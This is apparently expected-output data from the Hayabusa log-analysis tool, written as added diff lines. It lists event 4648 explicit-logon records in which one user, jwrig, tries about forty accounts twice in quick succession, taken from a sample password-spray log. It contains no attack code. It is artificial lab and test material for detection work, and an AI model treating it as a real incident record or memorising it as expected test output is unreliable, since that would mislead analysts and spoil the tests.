+2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
